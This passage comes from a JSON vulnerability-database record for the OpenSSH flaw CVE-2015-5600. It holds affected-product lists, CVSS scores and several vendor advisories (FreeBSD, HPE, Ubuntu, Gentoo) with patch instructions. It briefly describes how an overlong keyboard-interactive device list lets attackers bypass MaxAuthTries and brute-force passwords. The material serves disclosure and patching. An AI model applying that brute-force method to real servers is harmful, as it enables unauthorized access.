"vendor": "juniper", "version": null }, { "model": "nsm4000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "qlogic 8gb intelligent pass-thru module and san switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.10" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "flex system fc43171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "bladecenter advanced management module 3.66n", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "vcx", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.8.17" }, { "model": "bladesystem c-class virtual connect", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.45" }, { "model": "bladesystem c-class virtual connect", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.30" }, { "model": "bladesystem c-class virtual connect", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.21" }, { "model": "bladesystem c-class virtual connect", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.62" }, { "model": "3par os", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.1.3" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "9.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p27", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p24", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p23", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p20", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p19", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.2" }, { "model": "10.1-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip gv0lb151-20nnnn1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "150010.0.1" }, { "model": "big-ip gv0lb151-20nnnn1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "15009.3.1" }, { "model": "big-ip gv0lb151-20nnnn1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "15009.1.3" }, { "model": "big-ip gv0lb151-10nnnn1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "150010.0.1" }, { "model": "big-ip gv0lb151-10nnnn1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "15009.3.1" }, { "model": "big-ip gv0lb151-10nnnn1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "15009.1.3" }, { "model": "big-ip gv0lb150-20nnnn0", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "150010.0.1" }, { "model": "big-ip gv0lb150-20nnnn0", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "15009.3.1" }, { "model": "big-ip gv0lb150-20nnnn0", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "15009.1.3" }, { "model": "big-ip gv0lb150-10nnnn0", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "150010.0.1" }, { "model": "big-ip gv0lb150-10nnnn0", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "15009.3.1" }, { "model": "big-ip gv0lb150-10nnnn0", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "15009.1.3" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.3.14.0" }, { "model": "qlogic 8gb intelligent pass-thru module and san switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.37.00" }, { "model": "flex system fc43171 8gb san switch and san pass-thru", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.7.01.00" }, { "model": "bladecenter advanced management module 3.66p", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "vcx", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9.8.18" }, { "model": "bladesystem c-class virtual connect", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.50" }, { "model": "3par os mu2", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.2.2" }, { "model": "3par os mu5", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.2.1" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.10.5" } ], "sources": [ { "db": "BID", "id": "75990" }, { "db": "JVNDB", "id": "JVNDB-2015-003969" }, { "db": "CNNVD", "id": "CNNVD-201508-001" }, { "db": "NVD", "id": "CVE-2015-5600" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "6.9", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-5600" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "king cope", "sources": [ { "db": "BID", "id": "75990" } ], "trust": 0.3 }, "cve": "CVE-2015-5600", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 8.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 7.8, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 8.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2015-5600", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-5600", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201508-001", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-5600", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-5600" }, { "db": "JVNDB", "id": "JVNDB-2015-003969" }, { "db": "CNNVD", "id": "CNNVD-201508-001" }, { "db": "NVD", "id": "CVE-2015-5600" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The kbdint_next_device function in auth2-chall.c in sshd in OpenSSH through 6.9 does not properly restrict the processing of keyboard-interactive devices within a single connection, which makes it easier for remote attackers to conduct brute-force attacks or cause a denial of service (CPU consumption) via a long and duplicative list in the ssh -oKbdInteractiveDevices option, as demonstrated by a modified client that provides a different password for each pam element on this list. Openssh of sshd of auth2-chall.c Inside kbdint_next_device The function is a keyboard interaction within a single connection (keyboard-interactive) The brute force is not adequately restricted for device processing. (brute-force) Attacks or service disruption (CPU Resource consumption ) There are vulnerabilities that are put into a state.By a third party ssh of -oKbdInteractiveDevices Brute force through an overly long and redundant list of options (brute-force) Attacks or service disruption (CPU Resource consumption ) There is a possibility of being put into a state. OpenSSH is prone to a security-bypass weakness. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. These vulnerabilities\ninclude:\n\nThe SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"POODLE\", which could be exploited remotely\nresulting in disclosure of information. \nThe following firmware versions of Virtual Connect (VC) are impacted:\n\nHPE BladeSystem c-Class Virtual Connect (VC) Firmware 4.30 through VC 4.45\nHPE BladeSystem c-Class Virtual Connect (VC) Firmware 3.62 through VC 4.21\n\nNote: Firmware versions 3.62 through 4.21 are not impacted by CVE-2016-0800,\nCVE-2015-3194, CVE-2014-3566, CVE-2015-0705, CVE-2016-0799, and\nCVE-2016-2842. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n=============================================================================\nFreeBSD-SA-15:16.openssh Security Advisory\n The FreeBSD Project\n\nTopic: OpenSSH multiple vulnerabilities\n\nCategory: contrib\nModule: openssh\nAnnounced: 2015-07-28, revised on 2015-07-30\nAffects: All supported versions of FreeBSD. \nCorrected: 2015-07-28 19:58:44 UTC (stable/10, 10.2-PRERELEASE)\n 2015-07-28 19:58:44 UTC (stable/10, 10.2-BETA2-p2)\n 2015-07-28 19:59:04 UTC (releng/10.2, 10.2-RC1-p1)\n 2015-07-28 19:59:11 UTC (releng/10.1, 10.1-RELEASE-p16)\n 2015-07-28 19:58:54 UTC (stable/9, 9.3-STABLE)\n 2015-07-28 19:59:22 UTC (releng/9.3, 9.3-RELEASE-p21)\n 2015-07-30 10:09:07 UTC (stable/8, 8.4-STABLE)\n 2015-07-30 10:09:31 UTC (releng/8.4, 8.4-RELEASE-p36)\nCVE Name: CVE-2014-2653, CVE-2015-5600\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. \n\n0. Revision history\n\nv1.0 2015-02-25 Initial release. \nv1.1 2015-07-30 Revised patch for FreeBSD 8.x to address regression when\n keyboard interactive authentication is used. \n\nI. Background\n\nOpenSSH is an implementation of the SSH protocol suite, providing an\nencrypted and authenticated transport for a variety of services,\nincluding remote shell access. \n\nThe security of the SSH connection relies on the server authenticating\nitself to the client as well as the user authenticating itself to the\nserver. SSH servers uses host keys to verify their identity. \n\nRFC 4255 has defined a method of verifying SSH host keys using Domain\nName System Security (DNSSEC), by publishing the key fingerprint using\nDNS with \"SSHFP\" resource record. RFC 6187 has defined methods to use\na signature by a trusted certification authority to bind a given public\nkey to a given digital identity with X.509v3 certificates. \n\nThe PAM (Pluggable Authentication Modules) library provides a flexible\nframework for user authentication and session setup / teardown. \n\nOpenSSH uses PAM for password authentication by default. \n\nII. Problem Description\n\nOpenSSH clients does not correctly verify DNS SSHFP records when a server\noffers a certificate. [CVE-2014-2653]\n\nOpenSSH servers which are configured to allow password authentication\nusing PAM (default) would allow many password attempts. \n\nIII. Impact\n\nA malicious server may be able to force a connecting client to skip DNS\nSSHFP record check and require the user to perform manual host verification\nof the host key fingerprint. This could allow man-in-the-middle attack\nif the user does not carefully check the fingerprint. [CVE-2014-2653]\n\nA remote attacker may effectively bypass MaxAuthTries settings, which would\nenable them to brute force passwords. [CVE-2015-5600]\n\nIV. Workaround\n\nSystems that do not use OpenSSH are not affected. \n\nThere is no workaround for CVE-2014-2653, but the problem only affects\nnetworks where DNSsec and SSHFP is properly configured. Users who uses\nSSH should always check server host key fingerprints carefully when\nprompted. \n\nSystem administrators can set:\n\n\tUsePAM no\n\nIn their /etc/ssh/sshd_config and restart sshd service to workaround the\nproblem described as CVE-2015-5600 at expense of losing features provided\nby the PAM framework. \n\nWe recommend system administrators to disable password based authentication\ncompletely, and use key based authentication exclusively in their SSH server\nconfiguration, when possible. This would eliminate the possibility of being\never exposed to password brute force attack. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\nSSH service has to be restarted after the update. A reboot is recommended\nbut not required. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nSSH service has to be restarted after the update. A reboot is recommended\nbut not required. \n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 9.3, 10.1, 10.2]\n# fetch https://security.FreeBSD.org/patches/SA-15:16/openssh.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:16/openssh.patch.asc\n# gpg --verify openssh.patch.asc\n\n[FreeBSD 8.4]\n# fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8.patch.asc\n# gpg --verify openssh-8.patch.asc\n\n# fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8-errata.patc\n# fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8-errata.patch.asc\n# gpg --verify openssh-8-errata.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart the SSH service, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/8/ r286067\nreleng/8.4/ r286068\nstable/9/ r285977\nreleng/9.3/ r285980\nstable/10/ r285976\nreleng/10.1/ r285979\nreleng/10.2/ r285978\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. References\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2653\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5600\u003e\n\nThe latest revision of this advisory is available at\n\u003cURL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:16.openssh.asc\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v2.1.6 (FreeBSD)\n\niQIcBAEBCgAGBQJVufuCAAoJEO1n7NZdz2rnHHAQALfjXH/WyrgpHxw1YFipwFSD\nbl+HLbdvMVbfBxLV7eVBK9RPQiyoxwocmU0uMdiNEIWt2llczTLEl/wtUjj6f4Ko\nK6E7AAOgOX4zdQxBd2502FvXC1oNbDEvK8X3M4MzPHAG4QRgXNffRGYvClmbayck\n2i+bjcHdKAEwFJjHk4wXOQ0yhdF6Q36bH0N3kPV9z7sAt3tuzSWhvtX6QQSyeuCJ\nie2db9CdSUnFhYELJnVMpVTf3ppMqUT6QEe45LmsGA6F8yWdMaW2vtMdJq6xFVYP\nINCUVyOlDRu0TibjLUpXu4KugeDgyTXy9oz4SRdnpcUWz33fM6aSgOkpiM1h05ja\nBJrs0HZbkjCwtD+8a0buoyIKb9NBIsDKbrec5g8AEDkAHjRzraLGAXUYwkFeyqYJ\nj+ll5r5iu5fc4s8QM+ySlGCW8V9Ix8FX7Rr7FhAWLSKEldDsnCRjG4EfrAcd1HiC\nPleAnLv4uKwfSugIBIEs5ls7+TzWytW8nnEpMEerXUD894suFIycOT6eoUYF/CCT\nI1nHWSITw4HSj8+wBvrhxwZCRqIMOAZB+3jzrwRE+QZkghoWnPnqrCn9uLkdndq5\newgz6PiuYC8Zx0Z6trA72oV+XjTKu2d6eO5tRpe9aAmhPmfBWg3fXYltVzTzF9IE\nr0z98qmTEPiTDi8dr+K/\n=GsXJ\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n\na-c05128992\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05128992\nVersion: 1\n\nHPSBST03599 rev.1 - HPE 3PAR OS running OpenSSH, Remote Denial of Service\n(DoS), Access Restriction Bypass\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-05-11\nLast Updated: 2016-05-11\n\nPotential Security Impact: Remote Access Restriction Bypass, Denial of\nService (DoS)\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nA vulnerability in OpenSSH has been addressed by HPE 3PAR OS. The vulnerabily\ncould be exploited remotely resulting in Denial of Service (DoS) or access\nrestriction bypass. \n\nReferences:\n\n - CVE-2015-5600\n - PSRT110106\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHPE 3PAR OS versions 3.1.3 and later, prior to 3.2.1 MU5 and 3.2.2 MU2\nrunning OpenSSH\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2015-5600 (AV:N/AC:L/Au:N/C:P/I:N/A:C) 8.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHPE has provided the following software updates and mitigation information to\nresolve the vulnerability in 3PAR OS running OpenSSH. \n\n+ 3PAR OS 3.2.1 MU5 and 3.2.2 MU2\n\n - HPE recommends prior impacted versions update to 3PAR OS 3.2.1 MU5 or\n3.2.2 MU2. \n\n+ 3PAR OS 3.1.3 is also vulnerable but will not be fixed. \n\n **Mitigation:** The best protection to guard against exploitation of this\nvulnerability is to securely configure and operate the storage array in\naccordance with the *HPE 3PAR Configuration Guidelines* documentation. Please\ncontact HPE Technical Support for assistance. \n\nHISTORY\nVersion:1 (rev.1) - 11 May 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability with any HPE supported\nproduct, send Email to: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. ============================================================================\nUbuntu Security Notice USN-2710-2\nAugust 18, 2015\n\nopenssh regression\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nUSN-2710-1 introduced a regression in OpenSSH. The upstream fix for\nCVE-2015-5600 caused a regression resulting in random authentication\nfailures in non-default configurations. This update fixes the problem. \n\nOriginal advisory details:\n\n Moritz Jodeit discovered that OpenSSH incorrectly handled usernames when\n using PAM authentication. If an additional vulnerability were discovered in\n the OpenSSH unprivileged child process, this issue could allow a remote\n attacker to perform user impersonation. (CVE number pending)\n Moritz Jodeit discovered that OpenSSH incorrectly handled context memory\n when using PAM authentication. If an additional vulnerability were\n discovered in the OpenSSH unprivileged child process, this issue could\n allow a remote attacker to bypass authentication or possibly execute\n arbitrary code. (CVE number pending)\n Jann Horn discovered that OpenSSH incorrectly handled time windows for\n X connections. (CVE-2015-5352)\n It was discovered that OpenSSH incorrectly handled keyboard-interactive\n authentication. \n (CVE-2015-5600)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.04:\n openssh-server 1:6.7p1-5ubuntu1.3\n\nUbuntu 14.04 LTS:\n openssh-server 1:6.6p1-2ubuntu2.3\n\nUbuntu 12.04 LTS:\n openssh-server 1:5.9p1-5ubuntu1.7\n\nIn general, a standard system update will make all the necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-2710-2\n http://www.ubuntu.com/usn/usn-2710-1\n https://launchpad.net/bugs/1485719\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/openssh/1:6.7p1-5ubuntu1.3\n https://launchpad.net/ubuntu/+source/openssh/1:6.6p1-2ubuntu2.3\n https://launchpad.net/ubuntu/+source/openssh/1:5.9p1-5ubuntu1.7\n. \nVCX prior to 9.8.18 with OpenSSH or ISC BIND. \n\n+ VCX 9.8.18 for the following Products/SKUs:\n\n - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n - JC518A HP VCX Connect 200 Primry 120 G6 Server\n - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n - JE341A HP VCX Connect 100 Secondary\n - JE252A HP VCX Connect Primary MIM Module\n - JE253A HP VCX Connect Secondary MIM Module\n - JE254A HP VCX Branch MIM Module\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n - JD023A HP MSR30-40 Router with VCX MIM Module\n - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n - JE340A HP VCX Connect 100 Pri Server 9.0\n - JE342A HP VCX Connect 100 Sec Server 9.0\n\nHISTORY\nVersion:1 (rev.1) - 28 January 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201512-04\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSH: Multiple vulnerabilities\n Date: December 20, 2015\n Bugs: #553724, #555518, #557340\n ID: 201512-04\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSH, the worst of which\ncould lead to arbitrary code execution, or cause a Denial of Service\ncondition. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/openssh \u003c 7.1_p1-r2 \u003e= 7.1_p1-r2\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSH. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\n\n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSH users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/openssh-6.9_p1-r2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-5352\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5352\n[ 2 ] CVE-2015-5600\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5600\n[ 3 ] CVE-2015-6563\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6563\n[ 4 ] CVE-2015-6564\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6564\n[ 5 ] CVE-2015-6565\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6565\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201512-04\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n", "sources": [ { "db": "NVD", "id": "CVE-2015-5600" }, { "db": "JVNDB", "id": "JVNDB-2015-003969" }, { "db": "BID", "id": "75990" }, { "db": 